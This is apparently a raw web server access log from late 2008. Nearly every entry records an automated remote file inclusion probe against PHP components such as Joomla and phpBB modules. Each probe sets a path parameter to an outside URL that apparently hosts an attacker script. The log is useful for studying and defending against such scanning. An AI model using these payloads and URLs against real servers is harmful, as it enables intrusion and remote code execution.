222.233.52.18 - - [10/Nov/2008:08:36:47 -0800] "GET /logs/access_080512.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
168.243.202.74 - - [10/Nov/2008:08:36:49 -0800] "GET /logs/access_081026.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.genesis-auctions.com/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:08:36:53 -0800] "GET /logs/access_080222.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:08:36:53 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:08:36:53 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:36:53 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:36:53 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.233.52.18 - - [10/Nov/2008:08:36:54 -0800] "GET /logs/access_080208.log%20%20//components/com_forum/download.php?phpbb_root_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:36:54 -0800] "GET /logs/access_080613.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.205.57.211 - - [10/Nov/2008:08:36:54 -0800] "GET /logs/access_080310.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/fonts.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:37:06 -0800] "GET /logs/access_080725.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:37:31 -0800] "GET /logs/access_080222.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:37:31 -0800] "GET /logs/access_080310.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:37:57 -0800] "GET /logs/access_080224.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.167.0.5 - - [10/Nov/2008:08:38:06 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.167.0.5 - - [10/Nov/2008:08:38:07 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://hellsrangersclan.com/modules/Album/daten.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.239.207.21 - - [10/Nov/2008:08:38:29 -0800] "GET /logs/access_080922.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
213.239.207.21 - - [10/Nov/2008:08:38:36 -0800] "GET /logs/access_080627.log HTTP/1.1" 200 1835008 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:08:38:38 -0800] "GET /logs//include/lib.inc.php?site_path=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:38:40 -0800] "GET /logs/access_080222.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
124.0.208.252 - - [10/Nov/2008:08:38:40 -0800] "GET /logs/access_080310.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.geocities.com/tutimasripah/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.76.68.90 - - [10/Nov/2008:08:38:52 -0800] "GET /logs/access_080712.log//administrator/index.php?option=com_login&task=§ionid=&id=&mosConfig_absolute_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:08:39:19 -0800] "GET /logs/access_081005.log//include/lib.inc.php?site_path=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:39:20 -0800] "GET /logs/access_080406.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.164.34 - - [10/Nov/2008:08:39:28 -0800] "GET /index.php?redir=http://www.bsthank.com.br/id.txt?? HTTP/1.1" 200 94616 "-" "libwww-perl/5.79" "www.dmulk.com"
64.27.13.94 - - [10/Nov/2008:08:39:29 -0800] "GET /logs/access_080414.log HTTP/1.1" 200 1336556 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:08:39:33 -0800] "GET /logs/access_081028.log/default.php?page=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:08:39:33 -0800] "GET /default.php?page=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:08:39:34 -0800] "GET /logs/default.php?page=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:39:38 -0800] "GET /logs/access_080308.log//errors.php?error=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:39:38 -0800] "GET /errors.php?error=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.165.84.215 - - [10/Nov/2008:08:39:38 -0800] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://controlloid.altervista.org/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:39:39 -0800] "GET /logs//errors.php?error=http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:08:39:50 -0800] "GET /logs/access_080613.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:08:39:51 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:08:39:51 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:08:39:58 -0800] "GET /logs/access_080613.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:08:39:59 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:08:39:59 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.172.64 - - [10/Nov/2008:08:40:44 -0800] "GET /logs/access_080401.log/default.php?page=http://www.hexapharm.com/extranet/locales/en/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:08:40:51 -0800] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/get_login.php?_SESSION[docroot_path]=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
70.38.38.230 - - [10/Nov/2008:08:40:51 -0800] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/errors.php?_SESSION[docroot_path]=http://shoppingcause.com/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:40:53 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:40:58 -0800] "GET /logs/access_080429.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:40:59 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:40:59 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
82.48.115.61 - - [10/Nov/2008:08:41:00 -0800] "GET /logs/access_081017.log//include/lib.inc.php?site_path=http://peppe951.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:41:12 -0800] "GET /logs/access_080702.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
24.63.144.198 - - [10/Nov/2008:08:41:16 -0800] "GET /logs/access_080725.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:41:26 -0800] "GET /logs/access_080904.log//embed/day.php?path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.76.163.60 - - [10/Nov/2008:08:41:26 -0800] "GET /logs/access_080725.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/blast.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:41:27 -0800] "GET /embed/day.php?path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:41:27 -0800] "GET /logs//embed/day.php?path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:41:28 -0800] "GET /logs/access_080521.log/index.php?go1=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:41:31 -0800] "GET /logs/access_080510.log/index.php?go1=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:41:31 -0800] "GET /logs/index.php?go1=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
88.198.54.67 - - [10/Nov/2008:08:41:32 -0800] "GET /index.php?go1=http://www.helpcerto.com.br/~jmt/a.txt?%0D?? HTTP/1.1" 200 94730 "-" "libwww-perl/5.814" "www.dmulk.com"
89.218.85.18 - - [10/Nov/2008:08:41:33 -0800] "GET /logs/access_081001.log//embed/day.php?path=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:41:36 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:41:36 -0800] "GET /logs/access_080710.log//modules/TotalCalendar/about.php?inc_dir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:41:36 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:41:54 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:41:54 -0800] "GET /skin/zero_vote/error.php?dir=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.131.37.249 - - [10/Nov/2008:08:41:56 -0800] "GET /blog/wp-rss2.php HTTP/1.0" 200 657 "-" "YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users 0; views 0)" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:42:09 -0800] "GET /logs/access_081001.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://waktu.hut2.ru/irc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:42:09 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://waktu.hut2.ru/irc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:42:09 -0800] "GET /logs//components/com_colorlab/admin.color.php?mosConfig_live_site=http://waktu.hut2.ru/irc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.201.13.207 - - [10/Nov/2008:08:42:10 -0800] "GET /logs/access_080830.log//components/com_colorlab/admin.color.php?mosConfig_live_site=http://waktu.hut2.ru/irc/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
74.208.148.87 - - [10/Nov/2008:08:42:10 -0800] "GET /logs/access_080831.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://ideaindustry.us/content/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.55.164.104 - - [10/Nov/2008:08:42:17 -0800] "GET /logs//sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.wutangcorp.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
72.55.164.104 - - [10/Nov/2008:08:42:17 -0800] "GET /sohoadmin/program/modules/mods_full/photo_album/includes/login.php?_SESSION[docroot_path]=http://www.wutangcorp.de/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:42:20 -0800] "GET /logs/access_080904.log//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:42:20 -0800] "GET /logs//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:42:20 -0800] "GET /logs/access_081001.log//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:42:22 -0800] "GET /logs/access_080724.log/http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
202.144.158.163 - - [10/Nov/2008:08:42:29 -0800] "GET /logs/access_080725.log/errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:08:42:32 -0800] "GET /errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:08:42:35 -0800] "GET /logs/errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:42:36 -0800] "GET /logs/access_080303.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:42:39 -0800] "GET /logs/access_080623.log//modules/TotalCalendar/about.php?inc_dir=http://www.minorleaguesportsfans.com//plugins/safehtml/gif/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:42:57 -0800] "GET /logs/access_080510.log/index.php?go1=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:42:57 -0800] "GET /logs/access_080521.log/index.php?go1=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:42:57 -0800] "GET /logs/index.php?go1=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.153 - - [10/Nov/2008:08:42:58 -0800] "GET /bikes/dteel/2008_07_05/?N=D HTTP/1.0" 200 992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.146.15.54 - - [10/Nov/2008:08:42:58 -0800] "GET /index.php?go1=http://www.mfa.gov.bt/kethek-id.txt?? HTTP/1.1" 200 94639 "-" "libwww-perl/5.805" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:43:16 -0800] "GET /errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:43:17 -0800] "GET /logs/access.log//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
146.164.26.31 - - [10/Nov/2008:08:43:21 -0800] "GET /logs/access_080303.log/http://skill-station.net/editor/loco.me.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:43:27 -0800] "GET /logs/access_080119.log//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:43:34 -0800] "GET /logs/access_080904.log%20%20//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.184.4.157 - - [10/Nov/2008:08:43:34 -0800] "GET /logs/access_081001.log%20%20//embed/day.php?path=http://www.mfa.gov.bt/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:43:54 -0800] "GET /logs/access_080904.log//embed/day.php?path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:43:54 -0800] "GET /embed/day.php?path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:43:54 -0800] "GET /logs/access_081001.log//embed/day.php?path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
70.38.54.118 - - [10/Nov/2008:08:43:54 -0800] "GET /logs//embed/day.php?path=http://www.manifestotrl.org/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
213.203.223.59 - - [10/Nov/2008:08:43:56 -0800] "GET /errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:44:36 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.29.70.187 - - [10/Nov/2008:08:44:37 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
72.29.70.187 - - [10/Nov/2008:08:44:37 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.artisangroupre.com/downlaod/LUXURYNEWSLETTER2008/css.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.39.48.181 - - [10/Nov/2008:08:44:50 -0800] "GET /logs/access_080905.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://pcpinformatica.com.br/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.22.164 - - [10/Nov/2008:08:44:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.164 - - [10/Nov/2008:08:45:26 -0800] "GET /logs/access_080331.log HTTP/1.0" 200 1376256 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:45:39 -0800] "GET /logs/access_080809.log/errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:45:40 -0800] "GET /errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
209.160.72.117 - - [10/Nov/2008:08:45:40 -0800] "GET /logs/access_080315.log/errors.php?error=http://www.enjoykankoku.jp/parti/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:45:44 -0800] "GET /logs/access.log//twindow_notice.php?shop_this_skin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:45:45 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.152.5 - - [10/Nov/2008:08:45:45 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:45:47 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.222.135 - - [10/Nov/2008:08:45:47 -0800] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://83.12.246.234/~jarek/galeria/stats.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.144.158.163 - - [10/Nov/2008:08:45:51 -0800] "GET /logs/access_080723.log/errors.php?error=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
